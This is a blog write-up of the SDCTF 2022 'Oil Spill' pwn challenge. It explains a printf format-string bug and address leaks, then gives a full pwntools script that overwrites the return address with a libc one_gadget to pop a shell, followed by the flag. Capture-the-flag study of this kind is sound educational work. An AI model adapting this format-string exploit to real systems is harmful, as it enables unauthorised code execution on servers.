Aynakeya's Blog

Kill My Emotion

[Pwn] Oil Spill [SDCTF 2022]

0x0 Introduction

Easy

Darn, these oil spills are going crazy nowadays. It looks like there's a little bit more than oil coming out of this program though...

Connect
nc oil.sdc.tf 1337

By green beans

files: OilSpill

0x1 Mitigation

1
2
3
4
5
Arch:     amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

0x2 Vulnerability

At start of the program, program leak libc address and stack address.

Then, the program uses (*_reloc.printf)();. We can use this printf to write whatever we want.

So the exploit would be overwriting the rip with libc one_gadget to get shell.

0x3 Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3

from pwn import *

exe = ELF("./OilSpill_patched")
libc = ELF("./libc6_2.27-3ubuntu1.5_amd64.so")
ld = ELF("./ld-2.27.so")

context.binary = exe


def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("oil.sdc.tf", 1337)

return r


def main():
r = conn()
if args.R2:
input("wait")
x = r.recvuntil(b"\n",drop=True).split(b", ")
libc.address = int(x[0],16) - libc.sym["puts"]
rip_address = int(x[2],16) + 0x148
print("rip addr",hex(rip_address))
print("libc base addr",hex(libc.address))
one_gadget = libc.address+0x10a2fc
print("one_gadget",hex(one_gadget))
r.sendlineafter(b'clean it?\n',fmtstr_payload(8,{rip_address:one_gadget},write_size='short'))
r.recvuntil(b"Proposition")
r.interactive()


if __name__ == "__main__":
main()

0x4 Flag

sdctf{th4nks_f0r_S4V1nG_tH3_duCk5}

0%